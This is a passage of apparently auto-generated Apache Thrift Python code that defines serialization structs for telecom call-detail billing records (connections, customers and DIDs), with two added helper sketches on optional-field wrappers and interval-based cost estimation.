(10, TType.I64, 'connect_time', None, None, ), # 10
(11, TType.I64, 'disconnect_time', None, None, ), # 11
(12, TType.STRING, 'cld_out', 'UTF8', None, ), # 12
(13, TType.STRING, 'cli_out', 'UTF8', None, ), # 13
(14, TType.STRING, 'prefix', 'UTF8', None, ), # 14
(15, TType.DOUBLE, 'price_1', None, None, ), # 15
(16, TType.DOUBLE, 'price_n', None, None, ), # 16
(17, TType.I32, 'interval_1', None, None, ), # 17
(18, TType.I32, 'interval_n', None, None, ), # 18
(19, TType.DOUBLE, 'post_call_surcharge', None, None, ), # 19
(20, TType.DOUBLE, 'connect_fee', None, None, ), # 20
(21, TType.I32, 'free_seconds', None, None, ), # 21
(22, TType.I32, 'grace_period', None, None, ), # 22
(23, TType.STRING, 'user_agent', 'UTF8', None, ), # 23
(24, TType.DOUBLE, 'pdd100', None, None, ), # 24
(25, TType.DOUBLE, 'pdd1xx', None, None, ), # 25
(26, TType.I64, 'i_account_debug', None, None, ), # 26
(27, TType.I32, 'i_protocol', None, None, ), # 27
(28, TType.STRING, 'release_source', 'UTF8', None, ), # 28
(29, TType.I64, 'call_setup_time', None, None, ), # 29
(30, TType.STRUCT, 'lrn_cld', (NullString, NullString.thrift_spec), None, ), # 30
(31, TType.STRUCT, 'area_name', (NullString, NullString.thrift_spec), None, ), # 31
(32, TType.STRUCT, 'i_media_relay', (NullInt64, NullInt64.thrift_spec), None, ), # 32
(33, TType.STRUCT, 'remote_ip', (NullString, NullString.thrift_spec), None, ), # 33
(34, TType.STRUCT, 'vendor_name', (NullString, NullString.thrift_spec), None, ), # 34
)
def __init__(self, i_cdrs_connection=None, i_call=None, i_connection=None, result=None, cost=None, delay=None, duration=None, billed_duration=None, setup_time=None, connect_time=None, disconnect_time=None, cld_out=None, cli_out=None, prefix=None, price_1=None, price_n=None, interval_1=None, interval_n=None, post_call_surcharge=None, connect_fee=None, free_seconds=None, grace_period=None, user_agent=None, pdd100=None, pdd1xx=None, i_account_debug=None, i_protocol=None, release_source=None, call_setup_time=None, lrn_cld=None, area_name=None, i_media_relay=None, remote_ip=None, vendor_name=None,):
self.i_cdrs_connection = i_cdrs_connection
self.i_call = i_call
self.i_connection = i_connection
self.result = result
self.cost = cost
self.delay = delay
self.duration = duration
self.billed_duration = billed_duration
self.setup_time = setup_time
self.connect_time = connect_time
self.disconnect_time = disconnect_time
self.cld_out = cld_out
self.cli_out = cli_out
self.prefix = prefix
self.price_1 = price_1
self.price_n = price_n
self.interval_1 = interval_1
self.interval_n = interval_n
self.post_call_surcharge = post_call_surcharge
self.connect_fee = connect_fee
self.free_seconds = free_seconds
self.grace_period = grace_period
self.user_agent = user_agent
self.pdd100 = pdd100
self.pdd1xx = pdd1xx
self.i_account_debug = i_account_debug
self.i_protocol = i_protocol
self.release_source = release_source
self.call_setup_time = call_setup_time
self.lrn_cld = lrn_cld
self.area_name = area_name
self.i_media_relay = i_media_relay
self.remote_ip = remote_ip
self.vendor_name = vendor_name
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.i_cdrs_connection = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.i_call = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.i_connection = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.I32:
self.result = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.DOUBLE:
self.cost = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.DOUBLE:
self.delay = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.DOUBLE:
self.duration = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 8:
if ftype == TType.DOUBLE:
self.billed_duration = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 9:
if ftype == TType.I64:
self.setup_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 10:
if ftype == TType.I64:
self.connect_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 11:
if ftype == TType.I64:
self.disconnect_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 12:
if ftype == TType.STRING:
self.cld_out = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 13:
if ftype == TType.STRING:
self.cli_out = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 14:
if ftype == TType.STRING:
self.prefix = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 15:
if ftype == TType.DOUBLE:
self.price_1 = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 16:
if ftype == TType.DOUBLE:
self.price_n = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 17:
if ftype == TType.I32:
self.interval_1 = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 18:
if ftype == TType.I32:
self.interval_n = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 19:
if ftype == TType.DOUBLE:
self.post_call_surcharge = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 20:
if ftype == TType.DOUBLE:
self.connect_fee = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 21:
if ftype == TType.I32:
self.free_seconds = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 22:
if ftype == TType.I32:
self.grace_period = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 23:
if ftype == TType.STRING:
self.user_agent = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 24:
if ftype == TType.DOUBLE:
self.pdd100 = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 25:
if ftype == TType.DOUBLE:
self.pdd1xx = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 26:
if ftype == TType.I64:
self.i_account_debug = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 27:
if ftype == TType.I32:
self.i_protocol = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 28:
if ftype == TType.STRING:
self.release_source = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 29:
if ftype == TType.I64:
self.call_setup_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 30:
if ftype == TType.STRUCT:
self.lrn_cld = NullString()
self.lrn_cld.read(iprot)
else:
iprot.skip(ftype)
elif fid == 31:
if ftype == TType.STRUCT:
self.area_name = NullString()
self.area_name.read(iprot)
else:
iprot.skip(ftype)
elif fid == 32:
if ftype == TType.STRUCT:
self.i_media_relay = NullInt64()
self.i_media_relay.read(iprot)
else:
iprot.skip(ftype)
elif fid == 33:
if ftype == TType.STRUCT:
self.remote_ip = NullString()
self.remote_ip.read(iprot)
else:
iprot.skip(ftype)
elif fid == 34:
if ftype == TType.STRUCT:
self.vendor_name = NullString()
self.vendor_name.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('CdrsConnections')
if self.i_cdrs_connection is not None:
oprot.writeFieldBegin('i_cdrs_connection', TType.I64, 1)
oprot.writeI64(self.i_cdrs_connection)
oprot.writeFieldEnd()
if self.i_call is not None:
oprot.writeFieldBegin('i_call', TType.I64, 2)
oprot.writeI64(self.i_call)
oprot.writeFieldEnd()
if self.i_connection is not None:
oprot.writeFieldBegin('i_connection', TType.I64, 3)
oprot.writeI64(self.i_connection)
oprot.writeFieldEnd()
if self.result is not None:
oprot.writeFieldBegin('result', TType.I32, 4)
oprot.writeI32(self.result)
oprot.writeFieldEnd()
if self.cost is not None:
oprot.writeFieldBegin('cost', TType.DOUBLE, 5)
oprot.writeDouble(self.cost)
oprot.writeFieldEnd()
if self.delay is not None:
oprot.writeFieldBegin('delay', TType.DOUBLE, 6)
oprot.writeDouble(self.delay)
oprot.writeFieldEnd()
if self.duration is not None:
oprot.writeFieldBegin('duration', TType.DOUBLE, 7)
oprot.writeDouble(self.duration)
oprot.writeFieldEnd()
if self.billed_duration is not None:
oprot.writeFieldBegin('billed_duration', TType.DOUBLE, 8)
oprot.writeDouble(self.billed_duration)
oprot.writeFieldEnd()
if self.setup_time is not None:
oprot.writeFieldBegin('setup_time', TType.I64, 9)
oprot.writeI64(self.setup_time)
oprot.writeFieldEnd()
if self.connect_time is not None:
oprot.writeFieldBegin('connect_time', TType.I64, 10)
oprot.writeI64(self.connect_time)
oprot.writeFieldEnd()
if self.disconnect_time is not None:
oprot.writeFieldBegin('disconnect_time', TType.I64, 11)
oprot.writeI64(self.disconnect_time)
oprot.writeFieldEnd()
if self.cld_out is not None:
oprot.writeFieldBegin('cld_out', TType.STRING, 12)
oprot.writeString(self.cld_out.encode('utf-8') if sys.version_info[0] == 2 else self.cld_out)
oprot.writeFieldEnd()
if self.cli_out is not None:
oprot.writeFieldBegin('cli_out', TType.STRING, 13)
oprot.writeString(self.cli_out.encode('utf-8') if sys.version_info[0] == 2 else self.cli_out)
oprot.writeFieldEnd()
if self.prefix is not None:
oprot.writeFieldBegin('prefix', TType.STRING, 14)
oprot.writeString(self.prefix.encode('utf-8') if sys.version_info[0] == 2 else self.prefix)
oprot.writeFieldEnd()
if self.price_1 is not None:
oprot.writeFieldBegin('price_1', TType.DOUBLE, 15)
oprot.writeDouble(self.price_1)
oprot.writeFieldEnd()
if self.price_n is not None:
oprot.writeFieldBegin('price_n', TType.DOUBLE, 16)
oprot.writeDouble(self.price_n)
oprot.writeFieldEnd()
if self.interval_1 is not None:
oprot.writeFieldBegin('interval_1', TType.I32, 17)
oprot.writeI32(self.interval_1)
oprot.writeFieldEnd()
if self.interval_n is not None:
oprot.writeFieldBegin('interval_n', TType.I32, 18)
oprot.writeI32(self.interval_n)
oprot.writeFieldEnd()
if self.post_call_surcharge is not None:
oprot.writeFieldBegin('post_call_surcharge', TType.DOUBLE, 19)
oprot.writeDouble(self.post_call_surcharge)
oprot.writeFieldEnd()
if self.connect_fee is not None:
oprot.writeFieldBegin('connect_fee', TType.DOUBLE, 20)
oprot.writeDouble(self.connect_fee)
oprot.writeFieldEnd()
if self.free_seconds is not None:
oprot.writeFieldBegin('free_seconds', TType.I32, 21)
oprot.writeI32(self.free_seconds)
oprot.writeFieldEnd()
if self.grace_period is not None:
oprot.writeFieldBegin('grace_period', TType.I32, 22)
oprot.writeI32(self.grace_period)
oprot.writeFieldEnd()
if self.user_agent is not None:
oprot.writeFieldBegin('user_agent', TType.STRING, 23)
oprot.writeString(self.user_agent.encode('utf-8') if sys.version_info[0] == 2 else self.user_agent)
oprot.writeFieldEnd()
if self.pdd100 is not None:
oprot.writeFieldBegin('pdd100', TType.DOUBLE, 24)
oprot.writeDouble(self.pdd100)
oprot.writeFieldEnd()
if self.pdd1xx is not None:
oprot.writeFieldBegin('pdd1xx', TType.DOUBLE, 25)
oprot.writeDouble(self.pdd1xx)
oprot.writeFieldEnd()
if self.i_account_debug is not None:
oprot.writeFieldBegin('i_account_debug', TType.I64, 26)
oprot.writeI64(self.i_account_debug)
oprot.writeFieldEnd()
if self.i_protocol is not None:
oprot.writeFieldBegin('i_protocol', TType.I32, 27)
oprot.writeI32(self.i_protocol)
oprot.writeFieldEnd()
if self.release_source is not None:
oprot.writeFieldBegin('release_source', TType.STRING, 28)
oprot.writeString(self.release_source.encode('utf-8') if sys.version_info[0] == 2 else self.release_source)
oprot.writeFieldEnd()
if self.call_setup_time is not None:
oprot.writeFieldBegin('call_setup_time', TType.I64, 29)
oprot.writeI64(self.call_setup_time)
oprot.writeFieldEnd()
if self.lrn_cld is not None:
oprot.writeFieldBegin('lrn_cld', TType.STRUCT, 30)
self.lrn_cld.write(oprot)
oprot.writeFieldEnd()
if self.area_name is not None:
oprot.writeFieldBegin('area_name', TType.STRUCT, 31)
self.area_name.write(oprot)
oprot.writeFieldEnd()
if self.i_media_relay is not None:
oprot.writeFieldBegin('i_media_relay', TType.STRUCT, 32)
self.i_media_relay.write(oprot)
oprot.writeFieldEnd()
if self.remote_ip is not None:
oprot.writeFieldBegin('remote_ip', TType.STRUCT, 33)
self.remote_ip.write(oprot)
oprot.writeFieldEnd()
if self.vendor_name is not None:
oprot.writeFieldBegin('vendor_name', TType.STRUCT, 34)
self.vendor_name.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
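
# Hedged sketch: CdrsConnections models optional columns (LRN, area name,
# media relay id, remote IP, vendor name) as wrapper structs -- NullString /
# NullInt64 -- instead of bare primitives, so "no value" travels as an
# explicit struct field. The wrappers are constructed empty below, exactly as
# read() does; their internal attributes are defined earlier in this module
# and are not assumed here.
def _example_connection_wrappers():
    conn = CdrsConnections(i_cdrs_connection=10, i_call=2, result=200)
    conn.lrn_cld = NullString()       # populate via the wrapper's own fields
    conn.i_media_relay = NullInt64()
    return conn
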
class CdrsCustomers(object):
"""
Attributes:
- i_cdrs_customer
- i_cdr
- i_customer
- cost
- billed_duration
- prefix
- price_1
- price_n
- interval_1
- interval_n
- post_call_surcharge
- connect_fee
- free_seconds
- grace_period
- i_call
- i_wholesaler
- setup_time
- duration
- area_name
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'i_cdrs_customer', None, None, ), # 1
(2, TType.I64, 'i_cdr', None, None, ), # 2
(3, TType.I64, 'i_customer', None, None, ), # 3
(4, TType.DOUBLE, 'cost', None, None, ), # 4
(5, TType.DOUBLE, 'billed_duration', None, None, ), # 5
(6, TType.STRING, 'prefix', 'UTF8', None, ), # 6
(7, TType.DOUBLE, 'price_1', None, None, ), # 7
(8, TType.DOUBLE, 'price_n', None, None, ), # 8
(9, TType.I32, 'interval_1', None, None, ), # 9
(10, TType.I32, 'interval_n', None, None, ), # 10
(11, TType.DOUBLE, 'post_call_surcharge', None, None, ), # 11
(12, TType.DOUBLE, 'connect_fee', None, None, ), # 12
(13, TType.I32, 'free_seconds', None, None, ), # 13
(14, TType.I32, 'grace_period', None, None, ), # 14
(15, TType.I64, 'i_call', None, None, ), # 15
(16, TType.I64, 'i_wholesaler', None, None, ), # 16
(17, TType.I64, 'setup_time', None, None, ), # 17
(18, TType.DOUBLE, 'duration', None, None, ), # 18
(19, TType.STRUCT, 'area_name', (NullString, NullString.thrift_spec), None, ), # 19
)
def __init__(self, i_cdrs_customer=None, i_cdr=None, i_customer=None, cost=None, billed_duration=None, prefix=None, price_1=None, price_n=None, interval_1=None, interval_n=None, post_call_surcharge=None, connect_fee=None, free_seconds=None, grace_period=None, i_call=None, i_wholesaler=None, setup_time=None, duration=None, area_name=None,):
self.i_cdrs_customer = i_cdrs_customer
self.i_cdr = i_cdr
self.i_customer = i_customer
self.cost = cost
self.billed_duration = billed_duration
self.prefix = prefix
self.price_1 = price_1
self.price_n = price_n
self.interval_1 = interval_1
self.interval_n = interval_n
self.post_call_surcharge = post_call_surcharge
self.connect_fee = connect_fee
self.free_seconds = free_seconds
self.grace_period = grace_period
self.i_call = i_call
self.i_wholesaler = i_wholesaler
self.setup_time = setup_time
self.duration = duration
self.area_name = area_name
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.i_cdrs_customer = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.i_cdr = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.i_customer = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.DOUBLE:
self.cost = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.DOUBLE:
self.billed_duration = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.STRING:
self.prefix = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.DOUBLE:
self.price_1 = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 8:
if ftype == TType.DOUBLE:
self.price_n = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 9:
if ftype == TType.I32:
self.interval_1 = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 10:
if ftype == TType.I32:
self.interval_n = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 11:
if ftype == TType.DOUBLE:
self.post_call_surcharge = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 12:
if ftype == TType.DOUBLE:
self.connect_fee = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 13:
if ftype == TType.I32:
self.free_seconds = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 14:
if ftype == TType.I32:
self.grace_period = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 15:
if ftype == TType.I64:
self.i_call = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 16:
if ftype == TType.I64:
self.i_wholesaler = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 17:
if ftype == TType.I64:
self.setup_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 18:
if ftype == TType.DOUBLE:
self.duration = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 19:
if ftype == TType.STRUCT:
self.area_name = NullString()
self.area_name.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('CdrsCustomers')
if self.i_cdrs_customer is not None:
oprot.writeFieldBegin('i_cdrs_customer', TType.I64, 1)
oprot.writeI64(self.i_cdrs_customer)
oprot.writeFieldEnd()
if self.i_cdr is not None:
oprot.writeFieldBegin('i_cdr', TType.I64, 2)
oprot.writeI64(self.i_cdr)
oprot.writeFieldEnd()
if self.i_customer is not None:
oprot.writeFieldBegin('i_customer', TType.I64, 3)
oprot.writeI64(self.i_customer)
oprot.writeFieldEnd()
if self.cost is not None:
oprot.writeFieldBegin('cost', TType.DOUBLE, 4)
oprot.writeDouble(self.cost)
oprot.writeFieldEnd()
if self.billed_duration is not None:
oprot.writeFieldBegin('billed_duration', TType.DOUBLE, 5)
oprot.writeDouble(self.billed_duration)
oprot.writeFieldEnd()
if self.prefix is not None:
oprot.writeFieldBegin('prefix', TType.STRING, 6)
oprot.writeString(self.prefix.encode('utf-8') if sys.version_info[0] == 2 else self.prefix)
oprot.writeFieldEnd()
if self.price_1 is not None:
oprot.writeFieldBegin('price_1', TType.DOUBLE, 7)
oprot.writeDouble(self.price_1)
oprot.writeFieldEnd()
if self.price_n is not None:
oprot.writeFieldBegin('price_n', TType.DOUBLE, 8)
oprot.writeDouble(self.price_n)
oprot.writeFieldEnd()
if self.interval_1 is not None:
oprot.writeFieldBegin('interval_1', TType.I32, 9)
oprot.writeI32(self.interval_1)
oprot.writeFieldEnd()
if self.interval_n is not None:
oprot.writeFieldBegin('interval_n', TType.I32, 10)
oprot.writeI32(self.interval_n)
oprot.writeFieldEnd()
if self.post_call_surcharge is not None:
oprot.writeFieldBegin('post_call_surcharge', TType.DOUBLE, 11)
oprot.writeDouble(self.post_call_surcharge)
oprot.writeFieldEnd()
if self.connect_fee is not None:
oprot.writeFieldBegin('connect_fee', TType.DOUBLE, 12)
oprot.writeDouble(self.connect_fee)
oprot.writeFieldEnd()
if self.free_seconds is not None:
oprot.writeFieldBegin('free_seconds', TType.I32, 13)
oprot.writeI32(self.free_seconds)
oprot.writeFieldEnd()
if self.grace_period is not None:
oprot.writeFieldBegin('grace_period', TType.I32, 14)
oprot.writeI32(self.grace_period)
oprot.writeFieldEnd()
if self.i_call is not None:
oprot.writeFieldBegin('i_call', TType.I64, 15)
oprot.writeI64(self.i_call)
oprot.writeFieldEnd()
if self.i_wholesaler is not None:
oprot.writeFieldBegin('i_wholesaler', TType.I64, 16)
oprot.writeI64(self.i_wholesaler)
oprot.writeFieldEnd()
if self.setup_time is not None:
oprot.writeFieldBegin('setup_time', TType.I64, 17)
oprot.writeI64(self.setup_time)
oprot.writeFieldEnd()
if self.duration is not None:
oprot.writeFieldBegin('duration', TType.DOUBLE, 18)
oprot.writeDouble(self.duration)
oprot.writeFieldEnd()
if self.area_name is not None:
oprot.writeFieldBegin('area_name', TType.STRUCT, 19)
self.area_name.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
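
# Hedged sketch: the rating columns on CdrsCustomers (price_1/interval_1 for
# the first billing increment, price_n/interval_n for later increments, plus
# connect_fee and free_seconds) follow the classic interval-rating layout.
# The formula below is ONE common interpretation -- prices assumed per
# minute, durations in seconds, rating fields assumed populated -- and is an
# assumption, not taken from this file.
def _example_estimate_customer_cost(rec):
    import math
    billable = max(0.0, (rec.billed_duration or 0.0) - (rec.free_seconds or 0))
    if billable <= 0.0:
        return rec.connect_fee or 0.0
    extra = max(0.0, billable - rec.interval_1)
    increments = math.ceil(extra / rec.interval_n)  # round up to interval_n
    charged_minutes_1 = rec.interval_1 / 60.0
    charged_minutes_n = increments * rec.interval_n / 60.0
    return ((rec.connect_fee or 0.0)
            + (rec.price_1 or 0.0) * charged_minutes_1
            + (rec.price_n or 0.0) * charged_minutes_n)
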
class CdrsDids(object):
"""
Attributes:
- i_cdrs_did
- i_call
- i_did
- did
- result
- cost
- duration
- billed_duration
- setup_time
- connect_time
- disconnect_time
- price_1
- price_n
- interval_1
- interval_n
- post_call_surcharge
- connect_fee
- free_seconds
- grace_period
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'i_cdrs_did', None, None, ), # 1
(2, TType.I64, 'i_call', None, None, ), # 2
(3, TType.I64, 'i_did', None, None, ), # 3
(4, TType.STRING, 'did', 'UTF8', None, ), # 4
(5, TType.I32, 'result', None, None, ), # 5
(6, TType.DOUBLE, 'cost', None, None, ), # 6
(7, TType.DOUBLE, 'duration', None, None, ), # 7
(8, TType.DOUBLE, 'billed_duration', None, None, ), # 8
(9, TType.I64, 'setup_time', None, None, ), # 9
(10, TType.I64, 'connect_time', None, None, ), # 10
(11, TType.I64, 'disconnect_time', None, None, ), # 11
(12, TType.DOUBLE, 'price_1', None, None, ), # 12
(13, TType.DOUBLE, 'price_n', None, None, ), # 13
(14, TType.I32, 'interval_1', None, None, ), # 14
(15, TType.I32, 'interval_n', None, None, ), # 15
(16, TType.DOUBLE, 'post_call_surcharge', None, None, ), # 16
(17, TType.DOUBLE, 'connect_fee', None, None, ), # 17
(18, TType.I32, 'free_seconds', None, None, ), # 18
(19, TType.I32, 'grace_period', None, None, ), # 19
)
def __init__(self, i_cdrs_did=None, i_call=None, i_did=None, did=None, result=None, cost=None, duration=None, billed_duration=None, setup_time=None, connect_time=None, disconnect_time=None, price_1=None, price_n=None, interval_1=None, interval_n=None, post_call_surcharge=None, connect_fee=None, free_seconds=None, grace_period=None,):
self.i_cdrs_did = i_cdrs_did
self.i_call = i_call
self.i_did = i_did
self.did = did
self.result = result
self.cost = cost
self.duration = duration
self.billed_duration = billed_duration
self.setup_time = setup_time
self.connect_time = connect_time
self.disconnect_time = disconnect_time
self.price_1 = price_1
self.price_n = price_n
self.interval_1 = interval_1
self.interval_n = interval_n
self.post_call_surcharge = post_call_surcharge
self.connect_fee = connect_fee
self.free_seconds = free_seconds
self.grace_period = grace_period
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.i_cdrs_did = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.i_call = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.i_did = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.did = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.I32:
self.result = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.DOUBLE:
self.cost = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.DOUBLE:
self.duration = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 8:
if ftype == TType.DOUBLE:
self.billed_duration = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 9:
if ftype == TType.I64:
self.setup_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 10:
if ftype == TType.I64:
self.connect_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 11:
if ftype == TType.I64:
self.disconnect_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 12:
if ftype == TType.DOUBLE:
self.price_1 = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 13:
if ftype == TType.DOUBLE:
self.price_n = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 14:
if ftype == TType.I32:
self.interval_1 = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 15:
if ftype == TType.I32:
self.interval_n = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 16:
if ftype == TType.DOUBLE:
self.post_call_surcharge = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 17:
if ftype == TType.DOUBLE:
self.connect_fee = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 18:
if ftype == TType.I32:
self.free_seconds = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 19:
if ftype == TType.I32:
self.grace_period = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('CdrsDids')
if self.i_cdrs_did is not None:
oprot.writeFieldBegin('i_cdrs_did', TType.I64, 1)
oprot.writeI64(self.i_cdrs_did)
oprot.writeFieldEnd()
if self.i_call is not None:
oprot.writeFieldBegin('i_call', TType.I64, 2)
oprot.writeI64(self.i_call)
oprot.writeFieldEnd()
if self.i_did is not None:
oprot.writeFieldBegin('i_did', TType.I64, 3)
oprot.writeI64(self.i_did)
oprot.writeFieldEnd()
if self.did is not None:
oprot.writeFieldBegin('did', TType.STRING, 4)
oprot.writeString(self.did.encode('utf-8') if sys.version_info[0] == 2 else self.did)
oprot.writeFieldEnd()
if self.result is not None:
oprot.writeFieldBegin('result', TType.I32, 5)
oprot.writeI32(self.result)
oprot.writeFieldEnd()
if self.cost is not None:
oprot.writeFieldBegin('cost', TType.DOUBLE, 6)
oprot.writeDouble(self.cost)
oprot.writeFieldEnd()
if self.duration is not None:
oprot.writeFieldBegin('duration', TType.DOUBLE, 7)
oprot.writeDouble(self.duration)
oprot.writeFieldEnd()
if self.billed_duration is not None:
oprot.writeFieldBegin('billed_duration', TType.DOUBLE, 8)
oprot.writeDouble(self.billed_duration)
oprot.writeFieldEnd()
if self.setup_time is not None:
oprot.writeFieldBegin('setup_time', TType.I64, 9)
oprot.writeI64(self.setup_time)
oprot.writeFieldEnd()
if self.connect_time is not None:
oprot.writeFieldBegin('connect_time', TType.I64, 10)
oprot.writeI64(self.connect_time)
oprot.writeFieldEnd()
if self.disconnect_time is not None:
oprot.writeFieldBegin('disconnect_time', TType.I64, 11)
oprot.writeI64(self.disconnect_time)
oprot.writeFieldEnd()
if self.price_1 is not None:
oprot.writeFieldBegin('price_1', TType.DOUBLE, 12)
oprot.writeDouble(self.price_1)
oprot.writeFieldEnd()
if self.price_n is not None:
oprot.writeFieldBegin('price_n', TType.DOUBLE, 13)
